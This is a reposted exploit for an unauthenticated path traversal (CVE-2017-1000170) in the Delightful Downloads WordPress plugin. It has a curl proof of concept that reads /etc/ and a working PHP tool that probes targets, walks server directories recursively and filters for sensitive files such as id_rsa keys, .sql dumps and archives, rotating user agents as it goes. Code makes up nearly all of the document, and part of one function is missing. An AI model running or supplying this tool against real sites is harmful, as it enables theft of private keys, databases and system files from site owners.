WordPress Plugin Delightful Downloads Jquery File Tree 1.6.6 – Path Traversal – Digitalmunition





WordPress Plugin Delightful Downloads Jquery File Tree 1.6.6 – Path Traversal


# Exploit Title: WordPress Plugin Delightful Downloads Jquery File Tree 1.6.6 - Path Traversal
# Date: 19/03/2021
# Exploit Author: Nicholas Ferreira
# Vendor Homepage: https://github.com/A5hleyRich/delightful-downloads
# Version: <= 1.6.6
# Tested on: Debian 11
# CVE : CVE-2017-1000170
# PHP version (exploit): 7.3.27
# POC: curl --data "dir=/etc/" http://example.com/wp-content/plugins/delightful-downloads/assets/vendor/jqueryFileTree/connectors/jqueryFileTree.php
// NOTE: the opening lines of post_request() (curl_init / POSTFIELDS setup) were lost in this copy; only the tail of the function survives below.
$data));
#curl_setopt($ch, CURLOPT_PROXY, "127.0.0.1:8080"); //debug w/ burp
if($random_agent){
curl_setopt($ch, CURLOPT_USERAGENT, $agents[rand(0,count($agents)-1)]);
}

$output = curl_exec($ch);
curl_close($ch);
return $output;
}

/**
 * Pull every rel="..." attribute value out of the HTML the connector returns.
 *
 * The script assumes the connector carries each entry's path in a rel="…"
 * attribute; this scans for each `rel="` opener and takes everything up to
 * the following `">` as the value.
 *
 * @param string $str raw HTML response body
 * @return string[] values in document order; [] when nothing matched. An
 *                  unterminated attribute stops the scan, keeping what was
 *                  collected so far.
 */
function parse_dir($str){ // by raina77ow =)
    $paths = array();
    $cursor = 0;
    for(;;){
        $open = strpos($str, 'rel="', $cursor);
        if($open === false){
            break;
        }
        $valueStart = $open + 5; // skip past rel="
        $close = strpos($str, '">', $valueStart);
        if($close === false){
            break; // unterminated attribute: stop here
        }
        $paths[] = substr($str, $valueStart, $close - $valueStart);
        $cursor = $close + 2; // resume after the closing ">
    }
    return $paths;
}

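/**
 * Print the entries the vulnerable connector returns for $path, optionally
 * descending into sub-directories.
 *
 * One POST per directory goes through post_request() (globals $vuln_file and
 * $random_agent) and the HTML comes back through parse_dir(). An entry
 * matching "#^/.*/$#" is treated as a directory; anything else as a file.
 *
 * Modes:
 *  - no filter: files are printed; directories are printed, or descended
 *    into instead when $recursive is set.
 *  - filter set: only entries (files or directories) containing at least one
 *    filter substring are printed; when $recursive is set every directory is
 *    descended into whether or not it matched.
 *
 * Changes vs. the previous version:
 *  - `global $recursive` is gone, so the $recursive argument is honoured
 *    instead of being silently replaced by the global of the same name.
 *  - an entry containing several filter strings is printed once, not once per
 *    match, and a matching directory is no longer skipped when recursing
 *    (previously that depended on the order of the filters).
 *  - names written to the terminal have control bytes replaced by "?": the
 *    listing is attacker-controlled output from the target, and a name
 *    carrying ANSI escapes would otherwise reach the operator's terminal raw.
 *  - a directory entry equal to $path is not descended into (loop guard).
 *  - "\n" literals restored (this copy showed them as "n").
 *
 * Filters are matched against the whole path string the connector returned,
 * so a filter that occurs in a parent directory's name matches everything
 * under it — same as the original behaviour.
 *
 * @param string   $url       base URL of the WordPress install
 * @param string   $path      absolute directory on the target, "/…/" form
 * @param int      $recursive 1 to descend into sub-directories, 0 to list only $path
 * @param string[] $filter    substrings (file names or ".ext") to print; empty = print everything
 * @return void   output is written to stdout
 */
function list_files($url, $path, $recursive = 0, $filter = array()){
    global $vuln_file;
    global $random_agent;

    $has_filter = count($filter) > 0;

    $is_dir = static function($entry){
        return preg_match("#^/.*/$#", $entry) === 1;
    };
    $matches = static function($entry) use ($filter){
        foreach($filter as $needle){
            // an empty needle would match everything, so it is ignored
            if($needle !== "" && strpos($entry, $needle) !== false){
                return true;
            }
        }
        return false;
    };
    // Display form of an entry: neutralise control characters before the
    // server-supplied name reaches the terminal.
    $show = static function($entry){
        echo " ".preg_replace('/[\x00-\x1f\x7f]/', '?', $entry)."\n";
    };

    $entries = parse_dir(post_request($url.$vuln_file, $path, $random_agent));

    foreach($entries as $entry){
        $dir = $is_dir($entry);
        // never recurse into the directory we just listed
        $descend = $dir && $recursive && $entry !== $path;

        if($has_filter){
            if($matches($entry)){
                $show($entry);
            }
            if($descend){
                list_files($url, $entry, $recursive, $filter);
            }
            continue;
        }

        if($descend){
            list_files($url, $entry, $recursive, $filter);
        }else{
            $show($entry);
        }
    }
}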

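/**
 * Confirm with the operator before a recursive walk from "/" and then run
 * list_files().
 *
 * A recursive scan of the server root issues one POST per directory on the
 * target, which is slow, noisy and may get the source blocked, so the tool
 * asks for an explicit "y" on stdin first. Anything else — including EOF when
 * stdin is not interactive — aborts.
 *
 * Fixes vs. the previous version: the stdin handle is closed on the abort
 * path too (it was only closed after a "y"), and the "\n" literals are
 * restored (this copy showed them as "n").
 *
 * @param string   $target    base URL of the WordPress install
 * @param string   $path      directory to start from, "/…/" form
 * @param int      $recursive 1 for a recursive walk
 * @param string[] $filter    filter substrings passed through to list_files()
 * @return void   exits the process when the operator declines
 */
function alert_user($target, $path, $recursive, $filter){ //scan the root of the server recursivelly can really be a pain
    if($path == "/" && $recursive == 1){
        echo red(" [i] WARNING: Scanning the root of the webserver recursivelly can
exceed the timeout limit, block your IP or even take down the server.
Are you sure you want to continue? [y/N] ");
        $handle = fopen("php://stdin", "r");
        $line = ($handle === false) ? false : fgets($handle);
        if($handle !== false){
            fclose($handle);
        }
        // fgets() returns false on EOF/closed stdin, which counts as "no"
        if($line === false || trim(strtoupper($line)) != 'Y'){
            echo "\n Aborted. Try running me without the recursion flag\n\n";
            exit;
        }
        echo cyan("\n\n Ok, don't say I didn't warn you...\n");
    }
    list_files($target, $path, $recursive, $filter);
}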

############################################################

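/**
 * Wrap $str in the ANSI bright-green SGR sequence, resetting afterwards.
 *
 * Fix: the escape character is "\e" (0x1B); this copy had lost the backslash
 * and emitted a literal "e[92m".
 *
 * @param string $str text to colour
 * @return string "\e[92m" . $str . "\e[0m"
 */
function green($str){
    return "\e[92m".$str."\e[0m";
}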
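/**
 * Wrap $str in the ANSI bright-red SGR sequence, resetting afterwards.
 *
 * Fix: the escape character is "\e" (0x1B); this copy had lost the backslash
 * and emitted a literal "e[91m".
 *
 * @param string $str text to colour
 * @return string "\e[91m" . $str . "\e[0m"
 */
function red($str){
    return "\e[91m".$str."\e[0m";
}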
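/**
 * Wrap $str in the ANSI bright-yellow SGR sequence, resetting afterwards.
 *
 * Fix: the escape character is "\e" (0x1B); this copy had lost the backslash
 * and emitted a literal "e[93m".
 *
 * @param string $str text to colour
 * @return string "\e[93m" . $str . "\e[0m"
 */
function yellow($str){
    return "\e[93m".$str."\e[0m";
}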
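/**
 * Wrap $str in the ANSI bright-cyan SGR sequence, resetting afterwards.
 *
 * Fix: the escape character is "\e" (0x1B); this copy had lost the backslash
 * and emitted a literal "e[96m".
 *
 * @param string $str text to colour
 * @return string "\e[96m" . $str . "\e[0m"
 */
function cyan($str){
    return "\e[96m".$str."\e[0m";
}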

/**
 * Print the tool banner (ASCII-art logo, author, target plugin and CVE).
 *
 * Echoes straight to stdout and returns nothing; the usage line further down
 * does `banner()." Usage..."`, relying on the null return concatenating as "".
 *
 * NOTE(review): this copy of the script appears to have lost backslashes and
 * collapsed runs of spaces (the "\n" inside the red() call shows as "n", and
 * the logo's "\" strokes and alignment are missing), so the literal below most
 * likely differs from the author's original — confirm against the upstream
 * source before relying on it.
 */
function banner(){
echo "
_____ _ _ _ _ __ _ _______
| __ | (_) | | | | / _| | |__ __|
| | | | ___| |_ __ _| |__ | |_| |_ _ _| | | |_ __ ___ ___
| | | |/ _ | |/ _` | _ | __| _| | | | | | | ´__/ _ / _
| |__| | __/ | | (_| | | | | |_| | | |_| | | | | | | __/ __/
|_____/ ___|_|_|__, |_| |_|__|_| __,_|_| |_|_| ___|___|
__/ | ".green("Coder: ").yellow("Nicholas Ferreira")."
|___/ 0x7359

".cyan("Delightful Downloads - Jquery File Tree")."
Unauthenticated Path Traversal exploit ".
red("n (CVE-2017-1000170)")."

";
}

// ======================= CHECKING =======================

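// ---- command-line parsing ------------------------------------------------
// Short/long pairs: -u/--url (value), -h/--help, -p/--path (value),
// -r/--recursive, -f/--filter (value), -a/--random-agent.
$short_args = "u:h::p:r::f:a::";
$long_args = array("url:", "help::", "path:", "recursive::", "filter:", "random-agent::");
$options = getopt($short_args, $long_args);

// Path of the vulnerable connector relative to the site root. Functions read it
// via `global $vuln_file`, but no definition is visible in this copy of the
// script, so fall back to the path from the POC header when nothing set it.
if(!isset($vuln_file)){
    $vuln_file = "/wp-content/plugins/delightful-downloads/assets/vendor/jqueryFileTree/connectors/jqueryFileTree.php";
}

// No arguments at all: banner plus a one-line usage (fix: the usage used to
// advertise "-x extensions", an option getopt() does not accept; it is -f).
if($argc == 1){
    die(banner()." Usage: php xpl_jqueryFileTree.php -u url [-f extensions/filenames] [-p path] [-r] [-h] [-a]\n\n Help: -h or --help\n\n");
}

if(isset($options['h']) || isset($options['help'])){
    banner();
    die(" Usage: php ".$argv[0]." -u url [-f extensions/filenames] [-p path] [-r] [-h] [-a]

-h, --help: Show this message
-u, --url: URL of target
-a, --random-agent: Use random user agents
-f, --filter: Name of files or extensions to search for (separated by comma)
-p, --path: The full path from which the filenames will be read (default: /)
-r, --recursive: Generates the tree recursivelly (be careful)

e.g.: ".cyan($argv[0]." -u victim.com -f .zip,.sql -p /var/www/html/backup/admin/ -r")."
|
-> This will search for all .zip and .sql files inside victim.com/backup/admin and its subpaths
(You must provide the dot to indicate it's an extension)

".cyan($argv[0]." -u victim.com -f .log,id_rsa -a -r")."
|
-> This will search for all files named \"id_rsa\" or having the extension
\".log\" within all folders of the server, with random user-agents

".yellow("Tip: use \"php ..... | tee output\" to save the result to an output file")."

");
}

// Value of a short/long option pair, or $default when neither was given.
// getopt() stores a present no-value flag as false, so isset() is the right
// presence test (it is true for false, false only for a missing key).
$opt = static function($short, $long, $default) use ($options){
    if(isset($options[$short])){
        return $options[$short];
    }
    if(isset($options[$long])){
        return $options[$long];
    }
    return $default;
};

$random_agent = ($opt('a', 'random-agent', null) !== null) ? 1 : 0;
$target = $opt('u', 'url', "");
$recursive = ($opt('r', 'recursive', null) !== null) ? 1 : 0;

// Fix: --path used to read $options['p'] instead of $options['path'], so the
// long form was silently ignored (undefined index) and the scan started at "/".
$path = $opt('p', 'path', "/");

// list_files() and the connector expect "/.../" form; force leading and
// trailing slashes and collapse the doubled slash that produces.
if($path !== "/" && !preg_match("#^/.*/$#", $path)){
    $path = str_replace("//", "/", "/".$path."/");
}

// Comma-separated filter list. Blank items (a stray or trailing comma) are
// dropped: an empty needle would otherwise match every entry.
$extensions = $opt('f', 'filter', "");
$filter = array();
if($extensions !== ""){
    foreach(explode(",", $extensions) as $needle){
        $needle = trim($needle);
        if($needle !== ""){
            $filter[] = $needle;
        }
    }
}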

// ========================= END CHECKING ==========================

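/**
 * Probe whether $url exposes the traversable jqueryFileTree connector.
 *
 * Two steps: a HEAD request to $url.$vuln_file must answer 2xx, then a POST
 * for "/" (via post_request()) must contain the connector's markup followed by
 * a typical OS top-level directory name. The second check is a heuristic: a
 * 2xx alone proves only that the file is served, and the directory-name match
 * can miss unusual layouts or, in theory, be spoofed by a decoy page.
 *
 * Changes vs. the previous version:
 *  - connect/total timeouts on the probe, and a transport failure (DNS, TLS,
 *    refused connection) is reported as such instead of being folded into
 *    "could not find a valid vulnerable file".
 *  - the 2xx test uses integer division rather than a string compare.
 *  - "\n" literals restored (this copy showed them as "n").
 *
 * Known limits kept as-is: redirects are not followed (a 301 to https:// or a
 * trailing-slash redirect reads as "not vulnerable"; give the final URL), and
 * the HEAD probe does not use the random user agent that post_request() does.
 *
 * @param string $url base URL of the WordPress install (reads globals
 *                    $vuln_file, $random_agent, $filter)
 * @return bool true when both checks pass
 */
function is_vulnerable($url){
    global $vuln_file;
    global $random_agent;
    global $filter;

    echo " [*] Target: ".$url."\n";
    if(count($filter) > 0){
        echo " [*] Filter: ".implode(", ", $filter)."\n\n";
    }
    echo cyan(" [i] Checking if the target is vulnerable...\n");

    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url.$vuln_file);
    curl_setopt($ch, CURLOPT_NOBODY, true); // HEAD request to vulnerable file
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); // keep stray bytes off stdout
    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
    curl_setopt($ch, CURLOPT_TIMEOUT, 30);
    $result = curl_exec($ch);
    $code = (int) curl_getinfo($ch, CURLINFO_HTTP_CODE);
    $error = curl_error($ch);
    curl_close($ch);

    if($result === false){
        echo red(" [-] Request failed: ".$error."\n");
        return false;
    }
    if(intdiv($code, 100) !== 2){ // anything but 2xx
        echo red(" [-] Could not find a valid vulnerable file. Maybe it doesn't exist,
you don't have permission to read it or it is in another directory.\n");
        return false;
    }

    echo yellow(" [i] HTTP response of vulnerable file is 2xx. May be vulnerable!\n");
    $post = post_request($url.$vuln_file, "/", $random_agent);
    // fingerprint: connector markup, then a top-level directory name from the
    // listing of "/" (Linux or Windows)
    if(preg_match("/jqueryfiletree.*(bin|boot|dev|etc|var|usr|windows|users|temp)/", strtolower((string) $post)) === 1){
        echo green(" [+] Target is vulnerable! Getting file list...\n\n");
        return true;
    }
    echo red(" [-] Target is not vulnerable... =(\n\n");
    return false;
}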
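// ---- entry point ---------------------------------------------------------
banner();

// -u/--url is mandatory; without it the probe would be sent to "" . $vuln_file.
if($target === ""){
    die(red(" [-] No target given. Use -u/--url (see -h).\n\n"));
}

// `global $filter` at file scope was a no-op and has been dropped; $filter is
// already the file-level variable here.
if(is_vulnerable($target)){
    alert_user($target, $path, $recursive, $filter);
    echo green("\n [+] Done!\n\n");
}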

?>
